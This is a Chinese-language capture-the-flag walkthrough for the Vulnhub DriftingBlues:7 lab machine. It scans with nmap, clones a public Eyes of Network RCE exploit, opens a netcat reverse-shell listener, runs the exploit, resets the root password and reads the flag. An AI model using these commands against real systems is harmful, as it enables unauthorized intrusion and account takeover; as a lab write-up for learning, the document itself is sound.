Vulnhub-DriftingBlues:7

目录

• • • Vulnhub-DriftingBlues:7
    • • 信息收集
      • • 扫描目标网段
        • 查看端口及服务
        • 查看服务运行的版本
      • 访问网站
      • 提升权限
      • 运行脚本

靶机下载地址：https://www.vulnhub.com/entry/driftingblues-7,680/

信息收集

扫描目标网段

nmap -sP 172.16.58.0/24 

查看端口及服务

nmap -p- 172.16.58.135

查看服务运行的版本

nmap -sV 172.16.58.135 

访问网站

我们从打开的端口进行访问，先打开80端口试一下，结果直接来到一个登陆页面

我们搜索一下Eyes of network，发现可以找到相应的exp
https://github.com/h4knet/eonrce
然后我们把它下载到kali里

git clone https://github.com/h4knet/eonrce.git  

提升权限

接下来我们赋予权限

cd eonrce
chmod +x ./eonrce.py

开启监听

nc -lvp 8888

运行脚本

./eonrce.py https://172.16.58.135 -ip 172.16.58.129 -port 8888

修改root密码

passwd root

然后我们使用ssh连接靶机

ssh 172.16.58.135

输入我们刚才修改的密码

查看文件发现flag.txt

ls -al

打开文件

cat flag.txt

成功获取。